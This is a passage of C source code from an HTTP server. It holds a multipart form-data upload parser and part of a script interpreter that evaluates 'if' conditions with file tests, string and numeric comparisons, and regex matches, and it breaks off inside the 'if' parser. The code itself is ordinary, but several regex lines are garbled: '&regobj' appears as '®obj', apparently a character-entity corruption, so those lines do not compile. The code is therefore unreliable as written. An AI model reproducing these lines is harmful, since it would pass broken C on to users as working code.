err_exit:
pat_bmvec_free(patvec1);
pat_bmvec_free(patvec2);
fbuf_free(fbf);
return ret;
}
/* When a file is uploaded by the POST method, the POST body is formatted as follows:
<boundary string>\r\n
Content-Disposition: form-data; name="TUploadFile"; filename="D:\tools\readme.txt"
Content-Type: text/plain
\r\n\r\n
<body content>\r\n
<boundary string>\r\n
Content-Disposition: form-data; name="TFileDesc"
\r\n\r\n
<form data>\r\n
<boundary string>--\r\n
an actual data packet looks like this:
-----------------------------7d7127950780
Content-Disposition: form-data; name="TUploadFile"; filename="F:\tmp\onebyte.txt"
Content-Type: text/plain
a
-----------------------------7d7127950780
Content-Disposition: form-data; name="TFileDesc"
hi
-----------------------------7d7127950780--\r\n
the boundary string is carried in the Content-Type header as follows:
Content-Type: multipart/form-data; boundary=---------------------------7d706402a6
*/
int ParseReqMultipartForm (void * vmsg, arr_t * formdatalist)
{
HTTPMsg * msg = (HTTPMsg *)vmsg;
char * pbgn = NULL;
char * poct = NULL;
char * pend = NULL;
char * pbody = NULL;
int bodylen = 0;
char * phd = NULL;
char * phdend = NULL;
char * pval = NULL;
char * ptmp = NULL;
int namelen, valuelen;
char * boundary;
HeaderUnit * punit = NULL;
static char * formtype = "multipart/form-data";
int len = 0;
FormDataNode * node = NULL;
char path[128];
pat_kmpvec_t * patvec1 = NULL;
pat_kmpvec_t * patvec2 = NULL;
if (!msg) return -1;
if (!formdatalist) return -2;
punit = http_header_get(msg, 0, "Content-Type", 12);
if (!punit) return -10;
GetRealPath(msg, path, sizeof(path));
/* compare the mime type
Content-Type: multipart/form-data; boundary=---------------------------7d706402a6
*/
pbgn = HUValue(punit); pend = pbgn + punit->valuelen;
pbgn = skipOver(pbgn, pend-pbgn, " \t", 2);
if (!pbgn || pbgn >= pend) return -100;
len = str_len(formtype);
if (pend - pbgn < len) return -101;
if (strncasecmp(pbgn, formtype, len) != 0)
return -200;
/* parse the boundary string, pbgn skips to the beginning of the key 'boundary' */
pbgn += len;
pbgn = skipOver(pbgn, pend-pbgn, ";, \t", 4);
if (!pbgn || pbgn >= pend) return -201;
poct = skipTo(pbgn, pend-pbgn, "=", 1);
if (!poct || poct >= pend) return -204;
/* pbgn skips to the beginning of the boundary value */
pbgn = skipOver(poct + 1, pend - poct - 1, " \t", 2);
if (!pbgn || pbgn >= pend) return -205;
poct = skipTo(pbgn, pend-pbgn, " \t,;\r\n", 6);
if (!poct) return -202;
if (poct <= pbgn) return -203;
len = poct - pbgn;
boundary = pbgn;
if (msg->req_file_cache)
return parse_req_multipart_filecache(msg, boundary, len, path, formdatalist);
/* parse the request body that contains the form data and file content */
pbgn = frameP(msg->req_body_stream);
pend = pbgn + frameL(msg->req_body_stream);
if (pend - pbgn < len) return -300;
patvec1 = pat_kmpvec_alloc(boundary, len, 1, 0);
patvec2 = pat_kmpvec_alloc("\r\n\r\n", 4, 1, 0);
poct = kmp_find_bytes(pbgn, pend-pbgn, boundary, len, patvec1);
if (!poct || poct >= pend) return -301;
while (pbgn < pend) {
pbgn = poct + len;
if (pend - pbgn == 4 && pbgn[0]=='-' && pbgn[1]=='-' && pbgn[2]=='\r' && pbgn[3]=='\n')
return 0;
pbgn += 2;
if (!pbgn || pbgn >= pend) return 0;
pbody = kmp_find_bytes(pbgn, pend-pbgn, "\r\n\r\n", 4, patvec2);
if (!pbody || pbody+4 >= pend) return 0;
pbody += 4;
/* find the body end: \r\n--<boundary string> */
poct = kmp_find_bytes(pbody, pend-pbody, boundary, len, patvec1);
if (!poct) return -350;
if (poct >= pend) return -351;
if (poct <= pbody) return -352;
poct = rskipTo(poct-1, poct-pbody, "\r", 1);
if (!poct) return -360;
if (poct >= pend) return -361;
if (poct <= pbody) return -362;
bodylen = poct - pbody;
/* now parse the headers in this section of multipart body */
node = kzalloc(sizeof(*node));
node->pbody = pbody;
node->bodylen = bodylen;
phdend = pbgn;
while (1) {
phd = skipOver(phdend, pbody-phdend, " \t\r\n,;", 6);
if (!phd || phd >= pbody) break;
phdend = skipTo(phd, pbody-phd, "\r\n", 2);
if (!phdend || phdend <= phd) break;
pval = skipTo(phd, phdend-phd, ":", 1);
if (!pval || pval <= phd) continue;
ptmp = rskipOver(pval-1, pval-phd, " \t", 2);
if (!ptmp || ptmp < phd) continue;
namelen = ptmp - phd + 1;
pval = skipOver(pval+1, phdend-pval-1, " \t", 2);
ptmp = rskipOver(phdend-1, phdend-pval, " \t", 2);
if (!ptmp || ptmp < pval) continue;
valuelen = ptmp - pval + 1;
if (namelen == 19 && strncasecmp(phd, "Content-Disposition", 19) == 0) {
node->pval = pval;
node->valuelen = valuelen;
} else if (namelen == 12 && strncasecmp(phd, "Content-Type", 12) == 0) {
node->typelen = valuelen;
if (valuelen > sizeof(node->conttype) - 1)
valuelen = sizeof(node->conttype) - 1;
memcpy(node->conttype, pval, valuelen);
}
}
parse_form_node(node, node->pval, node->valuelen, path);
arr_push(formdatalist, node);
}
pat_kmpvec_free(patvec1);
pat_kmpvec_free(patvec2);
return 0;
}
<|start_filename|>src/http_script.c<|end_filename|>
/*
* Copyright (c) 2003-2021 <NAME> <<EMAIL>>
* All rights reserved. See MIT LICENSE for redistribution.
*/
#include "adifall.ext"
#include "epump.h"
#ifdef UNIX
#include <regex.h>
#endif
#if defined(_WIN32) || defined(_WIN64)
#define PCRE_STATIC 1
#include "pcre.h"
#endif
#include "http_listen.h"
#include "http_msg.h"
#include "http_mgmt.h"
#include "http_header.h"
#include "http_variable.h"
#include "http_script.h"
typedef char * ScriptParser (void * vhsc, char * p, int slen);
typedef struct script_cmd_s {
char * cmd;
int len;
void * parser;
} scmd_t;
hashtab_t * script_parser_table = NULL;
void * http_script_alloc ()
{
HTTPScript * hsc = NULL;
hsc = kzalloc(sizeof(*hsc));
if (!hsc) return NULL;
hsc->alloc = 1;
return hsc;
}
int http_script_init (void * vhsc, void * vmsg, char * psc, int sclen, uint8 sctype, char * vname, int vtype)
{
HTTPScript * hsc = (HTTPScript *)vhsc;
if (!hsc) return -1;
hsc->msg = vmsg;
hsc->script = psc;
hsc->scriptlen = sclen;
hsc->sctype = sctype;
hsc->replied = 0;
hsc->exitflag = 0;
hsc->reloc = 0;
hsc->retval = NULL;
hsc->retvallen = 0;
hsc->vname = vname;
hsc->vtype = vtype;
return 0;
}
void http_script_free (void * vhsc)
{
HTTPScript * hsc = (HTTPScript *)vhsc;
if (!hsc) return;
if (hsc->retval) {
kfree(hsc->retval);
hsc->retval = NULL;
}
hsc->retvallen = 0;
hsc->msg = NULL;
hsc->script = NULL;
hsc->scriptlen = 0;
hsc->sctype = 0;
hsc->replied = 0;
hsc->exitflag = 0;
hsc->reloc = 0;
hsc->vname = NULL;
hsc->vtype = 0;
if (hsc->alloc) {
kfree(hsc);
}
}
int is_symbol_char (int c)
{
if ( (c >= 'a' && c <= 'z') || (c >= 'A' && c <= 'Z') ||
( c >= '0' && c <= '9') || (c == '_') )
return 1;
switch (c) {
case '.':
case '-':
case ':':
case '/':
case '&':
case '?':
case '#':
case '%':
case '@':
case '*':
case '!':
case '~':
case ',':
case ';':
return 1;
}
return 0;
}
static int is_exp_char (int c)
{
if ( (c >= 'a' && c <= 'z') || (c >= 'A' && c <= 'Z') ||
( c >= '0' && c <= '9') || (c == '_') )
return 1;
return 0;
}
static int is_var_char (int c)
{
if ( (c >= 'a' && c <= 'z') || (c >= 'A' && c <= 'Z') || (c == '_') )
return 1;
return 0;
}
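/* trim trailing whitespace and quote characters in place (writing '\0')
and skip leading quotes/whitespace; returns a pointer to the first
significant character of the value. */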
char * trim_var (char * p, int len)
{
int i;
if (!p) return p;
if (len < 0) len = strlen(p);
if (len <= 0) return p;
for ( ; len > 0 && (ISSPACE(p[len-1]) || p[len-1] == '"' || p[len-1] == '\''); len--)
p[len-1] = '\0';
for (i = 0; i < len && (p[i] == '"' || p[i] == '\'' || ISSPACE(p[i])); i++);
return p + i;
}
char * goto_var_end (char * p, int len)
{
char * pbgn = p;
char * pend = NULL;
char * poct = NULL;
if (!p) return p;
if (len < 0) len = strlen(p);
if (len <= 0) return p;
pend = pbgn + len;
pbgn = skipOver(pbgn, len, " \t\r\n\f\v", 6);
if (pbgn >= pend) return pbgn;
if (*pbgn != '$') return pbgn;
pbgn++;
if (*pbgn == '{') {
/* ${ fid }$query[0] */
pbgn = skipToPeer(pbgn, pend-pbgn, '{', '}');
if (pbgn >= pend) return pbgn;
return pbgn + 1;
}
poct = pbgn;
while (poct < pend && is_var_char(*poct)) poct++;
if (poct == pbgn) return poct + 1; //$$abc $@abc
if (poct >= pend) return poct;
/* $request_header[accept] */
if (poct < pend && *poct == '[') {
poct = skipToPeer(poct, pend-poct, '[', ']');
if (poct >= pend) return poct;
if (*poct == ']') poct++;
}
return poct;
}
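/* skip one whitespace-delimited script token, traversing $variables,
quoted strings and parenthesised groups as single units. */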
char * goto_symbol_end (char * p, int len)
{
char * pbgn = p;
char * pend = NULL;
if (!p) return p;
if (len < 0) len = strlen(p);
if (len <= 0) return p;
pend = pbgn + len;
pbgn = skipOver(pbgn, len, " \t\r\n\f\v", 6);
if (pbgn >= pend) return pbgn;
/* $abc$efg${ fid }istillhere */
for ( ; pbgn < pend; ) {
if (*pbgn == '$') {
pbgn = goto_var_end(pbgn, pend-pbgn);
if (pbgn >= pend) return pbgn;
} else if (*pbgn == '"' || *pbgn == '\'') {
pbgn = skipEscTo(pbgn+1, pend-pbgn-1, pbgn, 1);
if (pbgn >= pend) return pbgn;
pbgn++;
} else if (*pbgn == '(') {
pbgn = skipToPeer(pbgn, pend-pbgn, '(', ')');
if (pbgn >= pend) return pbgn;
pbgn++;
} else if (ISSPACE(*pbgn)) {
return pbgn;
} else {
pbgn++;
}
}
return pbgn;
}
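/* extract the variable name following '$' (braced or bare, including an
optional [key] suffix) into vname and return a pointer just past the
reference. */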
char * get_var_name (char * p, int len, char * vname, int vlen)
{
char * pbgn = p;
char * pend = NULL;
char * poct = NULL;
char * pvarend = NULL;
if (!p) return p;
if (len < 0) len = strlen(p);
if (len <= 0) return p;
if (!vname || vlen <= 0) return p;
vname[0] = '\0';
pend = pbgn + len;
pbgn = skipOver(pbgn, len, " \t\r\n\f\v", 6);
if (pbgn >= pend) return pbgn;
if (*pbgn != '$') return pbgn;
if (pbgn[1] == '{') {
poct = skipToPeer(pbgn+1, pend-pbgn-1, '{', '}');
if (!poct || poct >= pend) return poct;
pbgn = skipOver(pbgn+2, poct-pbgn-2, " \t\r\n", 4);
if (pbgn >= poct) return poct + 1;
/* ${ remote_addr }, or ${ query [ fid ] } */
pvarend = rskipOver(poct-1, poct-pbgn, " \t\r\n", 4);
str_secpy(vname, vlen, pbgn, pvarend-pbgn+1);
pbgn = poct + 1;
} else {
poct = pbgn + 1;
while (poct < pend && is_var_char(*poct)) poct++;
if (poct <= pbgn + 1) return pbgn;
/* $request_header[accept] */
if (poct < pend && *poct == '[') {
poct = skipTo(poct, pend-poct, "]", 1);
if (poct < pend && *poct == ']') poct++;
}
str_secpy(vname, vlen, pbgn + 1, poct-pbgn-1);
pbgn = poct;
}
return pbgn;
}
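/* evaluate a script expression: strip enclosing quotes or parentheses, then
either expand embedded $variables via http_var_copy (getvar != 0) or copy
the raw text into value. */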
int get_var_value (void * vhsc, char * p, int len, char * value, int vallen, int getvar)
{
HTTPScript * hsc = (HTTPScript *)vhsc;
char * pbgn = p;
char * pend = NULL;
char * poct = NULL;
if (!hsc) return -1;
if (!p) return -2;
if (len < 0) len = strlen(p);
if (len <= 0) return -3;
if (!value || vallen <= 0) return -10;
value[0] = '\0';
pend = pbgn + len;
pbgn = skipOver(pbgn, len, " \t\r\n\f\v", 6);
if (pbgn >= pend) return -100;
poct = rskipOver(pend-1, pend-pbgn, " \t\r\n\f\v", 6);
if (poct < pbgn) return -101;
pend = poct + 1;
if ( ((*pbgn == '"' || *pbgn == '\'') && *poct == *pbgn) ||
(*pbgn == '(' && *poct == ')') ) {
pbgn++;
poct--;
pend--;
if (pbgn >= pend) return 0;
}
if (getvar)
return http_var_copy(hsc->msg, pbgn, pend-pbgn, value, vallen, NULL, 0, hsc->vname, hsc->vtype);
return str_secpy(value, vallen, pbgn, pend-pbgn);
}
/* if ( -d /opt/abc.html && -x aaa.txt ) */
static int script_if_file_parse (void * vhsc, char * pbgn, int len, char ** pterm)
{
HTTPScript * hsc = (HTTPScript *)vhsc;
char buf[4096];
char * pend = NULL;
char * poct = NULL;
char * pexpend = NULL;
#ifdef UNIX
struct stat fs;
#endif
if (pterm) *pterm = pbgn;
if (!hsc || !pbgn || len <= 0) return 0;
pend = pbgn + len;
if (pend - pbgn > 2 && pbgn[0] == '-' &&
(pbgn[1] == 'f' || pbgn[1] == 'd' || pbgn[1] == 'e' || pbgn[1] == 'x'))
{
poct = skipOver(pbgn+2, pend-pbgn-2, " \t\r\n\f\v", 6);
if (poct >= pend) {
if (pterm) *pterm = poct;
return 0;
}
pexpend = goto_symbol_end(poct, pend-poct);
if (pterm) *pterm = pexpend;
get_var_value(hsc, poct, pexpend-poct, buf, sizeof(buf)-1, 1);
poct = trim_var(buf, strlen(buf));
if (pbgn[1] == 'f') {
if (file_is_regular(poct)) return 1;
} else if (pbgn[1] == 'd') {
if (file_is_dir(poct)) return 1;
} else if (pbgn[1] == 'e') {
if (file_exist(poct)) return 1;
} else if (pbgn[1] == 'x') {
#ifdef UNIX
if (file_stat(poct, &fs) < 0) return 0;
if (fs.st_mode & (S_IXUSR | S_IXGRP | S_IXOTH))
return 1;
#endif
}
}
return 0;
}
/* if ( !-d /opt/abc.html && -x aaa.txt ) */
static int script_if_not_file_parse (void * vhsc, char * pbgn, int len, char ** pterm)
{
HTTPScript * hsc = (HTTPScript *)vhsc;
char buf[4096];
char * pend = NULL;
char * poct = NULL;
char * pexpend = NULL;
#ifdef UNIX
struct stat fs;
#endif
if (pterm) *pterm = pbgn;
if (!hsc || !pbgn || len <= 0) return 0;
pend = pbgn + len;
if (pend - pbgn > 3 && pbgn[0] == '!' && pbgn[1] == '-' &&
(pbgn[2] == 'f' || pbgn[2] == 'd' || pbgn[2] == 'e' || pbgn[2] == 'x'))
{
poct = skipOver(pbgn+3, pend-pbgn-3, " \t\r\n\f\v", 6);
if (poct >= pend) {
if (pterm) *pterm = poct;
return 0;
}
pexpend = goto_symbol_end(poct, pend-poct);
if (pterm) *pterm = pexpend;
get_var_value(hsc, poct, pexpend-poct, buf, sizeof(buf)-1, 1);
poct = trim_var(buf, strlen(buf));
if (pbgn[2] == 'f') {
if (!file_is_regular(poct)) return 1;
} else if (pbgn[2] == 'd') {
if (!file_is_dir(poct)) return 1;
} else if (pbgn[2] == 'e') {
if (!file_exist(poct)) return 1;
} else if (pbgn[2] == 'x') {
#ifdef UNIX
if (file_stat(poct, &fs) < 0) return 1;
if (!(fs.st_mode & (S_IXUSR | S_IXGRP | S_IXOTH)))
return 1;
#endif
}
}
return 0;
}
static int str_val_type (char * p, int len)
{
int i;
int hasdot = 0;
if (!p) return -1;
if (len < 0) len = strlen(p);
if (len <= 0) return -2;
if (p[0] < '0' || p[0] > '9')
return 0; //string
for (i = 1; i < len; i++) {
if (p[i] == '.') {
hasdot++;
if (hasdot > 1) return 0;
} else if (p[i] < '0' || p[i] > '9') {
return 0; //string
}
}
if (hasdot == 0) return 1; //integer
return 2; //double
}
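/* compare two expanded operands according to cmpsym: numeric comparison
when both sides parse as numbers, case-insensitive string comparison
otherwise. '^~' tests a prefix, '~' and '~*' run a regular-expression
match (case-sensitive / case-insensitive). returns 1 when the condition
holds, 0 otherwise. */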
static int script_if_objcmp (void * vhsc, char * avar, int avarlen, char * cmpsym, char * bvar, int bvarlen)
{
HTTPScript * hsc = (HTTPScript *)vhsc;
char bufa[4096];
char bufb[4096];
int lena = 0;
int lenb = 0;
char * pa = NULL;
char * pb = NULL;
int valtypea = 0;
int valtypeb = 0;
int64 aival64 = 0;
int64 bival64 = 0;
double adval = 0;
double bdval = 0;
#ifdef UNIX
regex_t regobj;
regmatch_t pmat[4];
#endif
#if defined(_WIN32) || defined(_WIN64)
pcre * regobj = NULL;
char * errstr = NULL;
int erroff = 0;
int ovec[36];
#endif
int ret = 0;
if (!hsc) return 0;
if (!avar || avarlen <= 0) return 0;
if (!cmpsym || strlen(cmpsym) <= 0) return 0;
if (!bvar || bvarlen <= 0) return 0;
get_var_value(hsc, avar, avarlen, bufa, sizeof(bufa)-1, 1);
get_var_value(hsc, bvar, bvarlen, bufb, sizeof(bufb)-1, 1);
pa = trim_var(bufa, strlen(bufa));
pb = trim_var(bufb, strlen(bufb));
lena = strlen(pa);
lenb = strlen(pb);
/* do comparing or matching calculation */
if (strcasecmp(cmpsym, "==") == 0) {
valtypea = str_val_type(pa, lena);
valtypeb = str_val_type(pb, lenb);
if (valtypea == 1 && valtypeb == 1) {
aival64 = strtoll(pa, NULL, 10);
bival64 = strtoll(pb, NULL, 10);
if (aival64 == bival64) return 1;
return 0;
} else if (valtypea == 2 && valtypeb == 2) {
adval = strtod(pa, NULL);
bdval = strtod(pb, NULL);
if (adval == bdval) return 1;
return 0;
}
return (strcasecmp(pa, pb) == 0) ? 1 : 0;
} else if (strcasecmp(cmpsym, ">") == 0) {
valtypea = str_val_type(pa, lena);
valtypeb = str_val_type(pb, lenb);
if (valtypea == 1 && valtypeb == 1) {
aival64 = strtoll(pa, NULL, 10);
bival64 = strtoll(pb, NULL, 10);
if (aival64 > bival64) return 1;
return 0;
} else if (valtypea == 2 && valtypeb == 2) {
adval = strtod(pa, NULL);
bdval = strtod(pb, NULL);
if (adval > bdval) return 1;
return 0;
}
return (strcasecmp(pa, pb) > 0) ? 1 : 0;
} else if (strcasecmp(cmpsym, ">=") == 0) {
valtypea = str_val_type(pa, lena);
valtypeb = str_val_type(pb, lenb);
if (valtypea == 1 && valtypeb == 1) {
aival64 = strtoll(pa, NULL, 10);
bival64 = strtoll(pb, NULL, 10);
if (aival64 >= bival64) return 1;
return 0;
} else if (valtypea == 2 && valtypeb == 2) {
adval = strtod(pa, NULL);
bdval = strtod(pb, NULL);
if (adval >= bdval) return 1;
return 0;
}
return (strcasecmp(pa, pb) >= 0) ? 1 : 0;
} else if (strcasecmp(cmpsym, "<") == 0) {
valtypea = str_val_type(pa, lena);
valtypeb = str_val_type(pb, lenb);
if (valtypea == 1 && valtypeb == 1) {
aival64 = strtoll(pa, NULL, 10);
bival64 = strtoll(pb, NULL, 10);
if (aival64 < bival64) return 1;
return 0;
} else if (valtypea == 2 && valtypeb == 2) {
adval = strtod(pa, NULL);
bdval = strtod(pb, NULL);
if (adval < bdval) return 1;
return 0;
}
return (strcasecmp(pa, pb) < 0) ? 1 : 0;
} else if (strcasecmp(cmpsym, "<=") == 0) {
valtypea = str_val_type(pa, lena);
valtypeb = str_val_type(pb, lenb);
if (valtypea == 1 && valtypeb == 1) {
aival64 = strtoll(pa, NULL, 10);
bival64 = strtoll(pb, NULL, 10);
if (aival64 <= bival64) return 1;
return 0;
} else if (valtypea == 2 && valtypeb == 2) {
adval = strtod(pa, NULL);
bdval = strtod(pb, NULL);
if (adval <= bdval) return 1;
return 0;
}
return (strcasecmp(pa, pb) <= 0) ? 1 : 0;
} else if (strcasecmp(cmpsym, "!=") == 0) {
valtypea = str_val_type(pa, lena);
valtypeb = str_val_type(pb, lenb);
if (valtypea == 1 && valtypeb == 1) {
aival64 = strtoll(pa, NULL, 10);
bival64 = strtoll(pb, NULL, 10);
if (aival64 != bival64) return 1;
return 0;
} else if (valtypea == 2 && valtypeb == 2) {
adval = strtod(pa, NULL);
bdval = strtod(pb, NULL);
if (adval != bdval) return 1;
return 0;
}
return (strcasecmp(pa, pb) == 0) ? 0 : 1;
} else if (strcasecmp(cmpsym, "^~") == 0) {
return (strncasecmp(pa, pb, strlen(pb)) == 0) ? 1 : 0;
} else if (strcasecmp(cmpsym, "~") == 0) {
#ifdef UNIX
memset(®obj, 0, sizeof(regobj));
regcomp(®obj, pb, REG_EXTENDED);
ret = regexec(®obj, pa, 4, pmat, 0);
regfree(®obj);
if (ret == 0) return 1;
if (ret == REG_NOMATCH) return 0;
#endif
#if defined(_WIN32) || defined(_WIN64)
regobj = pcre_compile(pb, 0, &errstr, &erroff, NULL);
if (!regobj) return 0;
ret = pcre_exec(regobj, NULL, pa, strlen(pa), 0, 0, ovec, 36);
pcre_free(regobj);
if (ret > 0) return 1;
if (ret <= 0) return 0;
#endif
} else if (strcasecmp(cmpsym, "~*") == 0) {
#ifdef UNIX
memset(®obj, 0, sizeof(regobj));
regcomp(®obj, pb, REG_EXTENDED | REG_ICASE);
ret = regexec(®obj, pa, 4, pmat, 0);
regfree(®obj);
if (ret == 0) return 1;
if (ret == REG_NOMATCH) return 0;
#endif
#if defined(_WIN32) || defined(_WIN64)
regobj = pcre_compile(pb, PCRE_CASELESS, &errstr, &erroff, NULL);
if (!regobj) return 0;
ret = pcre_exec(regobj, NULL, pa, strlen(pa), 0, 0, ovec, 36);
pcre_free(regobj);
if (ret > 0) return 1;
if (ret <= 0) return 0;
#endif
}
return 0;
}
/* if ( $request_header[content-type] == "text/html" ) */
static int script_if_objcmp_parse (void * vhsc, char * pbgn, int len, char ** pterm,
char * pa, int palen, char * pcmp, char * pb, int pblen)
{
HTTPScript * hsc = (HTTPScript *)vhsc;
char * pend = NULL;
char * poct = NULL;
char * avar = NULL;
char * bvar = NULL;
int alen = 0;
int blen = 0;
char cmpsym[8];
int cmplen = 0;
if (pterm) *pterm = pbgn;
if (!hsc) return 0;
if (pbgn && len > 0) {
pend = pbgn + len;
pbgn = skipOver(pbgn, pend - pbgn, " \t\r\n\f\v", 6);
if (pbgn > pend) {
if (pterm) *pterm = pbgn;
return 0;
}
}
if (pa && palen > 0) {
avar = pa; alen = palen;
} else {
poct = goto_symbol_end(pbgn, pend - pbgn);
avar = pbgn; alen = poct - pbgn;
if (pterm) *pterm = poct;
pbgn = skipOver(poct, pend - poct, " \t\r\n\f\v", 6);
if (pbgn > pend) {
return 2; //indicate only one obj
}
}
if (pcmp) {
str_secpy(cmpsym, sizeof(cmpsym)-1, pcmp, strlen(pcmp));
} else {
/* all kinds of comparing symbol: == != ~ ^~ ~* > < >= <= */
for (poct = pbgn; poct < pend; poct++) {
if (is_exp_char(*poct)) break;
if (ISSPACE(*poct)) break;
}
cmplen = poct - pbgn;
if (poct > pbgn)
str_secpy(cmpsym, sizeof(cmpsym)-1, pbgn, poct-pbgn);
else
cmpsym[0] = '\0';
pbgn = skipOver(poct, pend - poct, " \t\r\n\f\v", 6);
if (pbgn > pend) {
return 2; //indicate only one obj
}
}
cmplen = strlen(cmpsym);
if (pa && palen > 0) {
bvar = pa; blen = palen;
} else {
/* extracting the second variable */
poct = goto_symbol_end(pbgn, pend - pbgn);
bvar = pbgn; blen = poct - pbgn;
if (pterm) *pterm = poct;
}
if (cmplen <= 0 || cmplen > 2) return 100;
if (cmplen == 1 && (cmpsym[0] != '~' && cmpsym[0] != '>' && cmpsym[0] != '<'))
return 101;
if (cmplen == 2 && (cmpsym[0] != '=' || cmpsym[1] != '=') &&
(cmpsym[0] != '!' || cmpsym[1] != '=') &&
(cmpsym[0] != '^' || cmpsym[1] != '~') &&
(cmpsym[0] != '~' || cmpsym[1] != '*') &&
(cmpsym[0] != '>' || cmpsym[1] != '=') &&
(cmpsym[0] != '<' || cmpsym[1] != '=') )
{
return 102;
}
return script_if_objcmp(hsc, avar, alen, cmpsym, bvar, blen);
}
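/* evaluate the condition of an 'if' statement: file tests (-f/-d/-e/-x and
their negated !- forms), parenthesised sub-conditions and operand
comparisons, combined with && / || (or the words 'and' / 'or'). returns
the boolean result. */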
int script_if_condition_parse (void * vhsc, char * cond, int condlen, char ** pterm)
{
HTTPScript * hsc = (HTTPScript *)vhsc;
char buf[4096];
char * pbgn = NULL;
char * pend = NULL;
char * poct = NULL;
char * pval = NULL;
char * pexpend = NULL;
int condnum = 0;
int reverse = 0;
int condval = 0;
int condcmp = 0; //0-none 1-and(&&) 2-or(||)
int ret = 0;
if (!hsc) return 0;
if (!cond) return 0;
if (condlen < 0) condlen = strlen(cond);
if (condlen <= 0) return 0;
pbgn = cond;
pend = cond + condlen;
pbgn = skipOver(pbgn, condlen, " \t\r\n\f\v", 6);
if (pbgn >= pend) return 0;
pexpend = rskipOver(pend-1, pend-pbgn, " \t\r\n\f\v", 6);
pend = pexpend + 1;
for ( ; pbgn < pend; ) {
pbgn = skipOver(pbgn, pend-pbgn, " \t\r\n\f\v", 6);
if (pbgn >= pend) return condval;
if (pend - pbgn > 2 && pbgn[0] == '-' &&
(pbgn[1] == 'f' || pbgn[1] == 'd' || pbgn[1] == 'e' || pbgn[1] == 'x'))
{
ret = script_if_file_parse(hsc, pbgn, pend-pbgn, &poct);
if (reverse) ret = ret > 0 ? 0 : 1;
if (condcmp == 1) condval = condval && ret;
else if (condcmp == 2) condval = condval || ret;
else condval = ret;
pbgn = poct;
condcmp = 0;
reverse = 0;
condnum++;
}
else if (pend - pbgn > 3 && pbgn[0] == '!' && pbgn[1] == '-' &&
(pbgn[2] == 'f' || pbgn[2] == 'd' || pbgn[2] == 'e' || pbgn[2] == 'x'))
{
ret = script_if_not_file_parse(hsc, pbgn, pend-pbgn, &poct);
if (reverse) ret = ret > 0 ? 0 : 1;
if (condcmp == 1) condval = condval && ret;
else if (condcmp == 2) condval = condval || ret;
else condval = ret;
pbgn = poct;
condcmp = 0;
reverse = 0;
condnum++;
} else if (pbgn[0] == '(') {
poct = skipToPeer(pbgn, pend-pbgn, '(', ')');
if (*poct != ')') return condval;
pbgn = skipOver(pbgn+1, poct-pbgn-1, " \t\r\n\f\v", 6);
if (pbgn >= poct) {
pbgn = poct + 1;
continue;
}
ret = script_if_condition_parse(hsc, pbgn, poct-pbgn, &pval);
            if (ret >= 2) { /* the content inside the brackets is treated as a single variable object */
/* if ( ($request_path) != "/opt/hls.html" ) */
/* ^ */
/* | */
ret = script_if_objcmp_parse(hsc, poct+1, pend-poct-1, &pval, pbgn, pval-pbgn, NULL, NULL, 0);
if (ret >= 2) {
pbgn = pval;
condcmp = 0;
reverse = 0;
condnum++;
continue;
}
}
pbgn = poct + 1;
if (ret == 0 || ret == 1) {
if (reverse) ret = ret > 0 ? 0 : 1;
if (condcmp == 1) condval = condval && ret;
else if (condcmp == 2) condval = condval || ret;
else condval = ret;
condcmp = 0;
reverse = 0;
condnum++;
}
} else if (pbgn[0] == '!') {
reverse = 1;
pbgn++;
continue;
} else {
ret = script_if_objcmp_parse(hsc, pbgn, pend-pbgn, &poct, NULL, 0, NULL, NULL, 0);
if (ret == 2) { //only one varobj, eg. if (($request_path) != "/opt/abc.txt") {
pval = skipOver(poct, pend-poct, " \t\r\n\f\v", 6);
if (pval >= pend) {
if (pterm) *pterm = poct;
if (condnum < 1) return 2;
}
get_var_value(hsc, pbgn, poct-pbgn, buf, sizeof(buf)-1, 1);
pval = trim_var(buf, strlen(buf));
if (strlen(pval) <= 0 ||
strcasecmp(pval, "0") == 0 ||
strcasecmp(pval, "false") == 0 ||
strcasecmp(pval, "no") == 0)
ret = 0;
else ret = 1;
if (condnum > 0) {
} else {
}
}
if (reverse) ret = ret > 0 ? 0 : 1;
if (condcmp == 1) condval = condval && ret;
else if (condcmp == 2) condval = condval || ret;
else condval = ret;
pbgn = poct;
condcmp = 0;
reverse = 0;
condnum++;
}
pbgn = skipOver(pbgn, pend-pbgn, " \t\r\n\f\v", 6);
if (pbgn >= pend) break;
if (pend - pbgn >= 2) {
if (pbgn[0] == '&' && pbgn[1] == '&') {
condcmp = 1; // AND operation
pbgn += 2;
} else if (pbgn[0] == '|' && pbgn[1] == '|') {
condcmp = 2; // OR operation
pbgn += 2;
} else if (adf_tolower(pbgn[0]) == 'o' && adf_tolower(pbgn[1]) == 'r') {
condcmp = 2; // OR operation
pbgn += 2;
}
}
if (pend - pbgn >= 3) {
if (adf_tolower(pbgn[0]) == 'a' && adf_tolower(pbgn[1]) == 'n' && adf_tolower(pbgn[2]) == 'd') {
condcmp = 1; // AND operation
pbgn += 3;
}
}
if (condcmp == 0) break;
}
return condval;
}
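
/* Illustrative, hypothetical condition examples showing what the condition
   parser above is designed to accept, based on the operators it handles
   (-f/-d/-e/-x file tests, !, parentheses, ==, !=, ~, ~*, ^~, >, <, >=, <=,
   and the connectors &&, ||, 'and', 'or'):

     if ($request_path ~* "\.(mp4|flv)$" && -f $real_file) { ... }
     if (!-d $real_path || $query[fid] == "1") { ... }
     if (($request_header[content-type]) != "text/html") { ... }

   The paths and key names above are placeholders. */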
char * script_if_parse (void * vhsc, char * p, int slen)
{
HTTPScript * hsc = (HTTPScript *)vhsc;
char * pbgn = NULL;
char * pend = NULL;
char * poct = NULL;
char * pval = NULL;
char * pexpend = NULL;
int condval = 0;
uint8 ifbody_exec = 0;
if (!hsc) return p;
if (!p) return NULL;
if (slen < 0) slen = strlen(p);
if (slen <= 2) return p;
if (str_ncmp(p, "if", 2) != 0) return p;
/* if (cond) {...} */
pbgn = p + 2;
pend = p + slen;
while (pbgn < pend) {
condval = 0;
/* skip 'if' and following space, to condition */
poct = skipOver(pbgn, pend-pbgn, " \t\r\n\f\v", 6);
if (poct >= pend || *poct != '(') {
/* condition invalid in 'if (cond)' expression, find the end of the expression */
pbgn = skipTo(poct, pend-poct, ";", 1);
return pbgn;
}
pexpend = skipTo(poct, pend-poct, ";", 1);
pval = skipToPeer(poct, pexpend-poct, '(', ')');
if (*pval != ')') {
return pexpend;
}
if (!ifbody_exec) {
condval = script_if_condition_parse(hsc, poct + 1, pval - poct - 1, NULL);
}
/* skip the condition block, stop to the if body */
pbgn = skipOver(pval+1, pend-pval-1, " \t\r\n\f\v", 6);
if (pbgn >= pend) return pbgn;
if (*pbgn == '{') {
/* if (cond) { ... } find { and assign to pbgn */
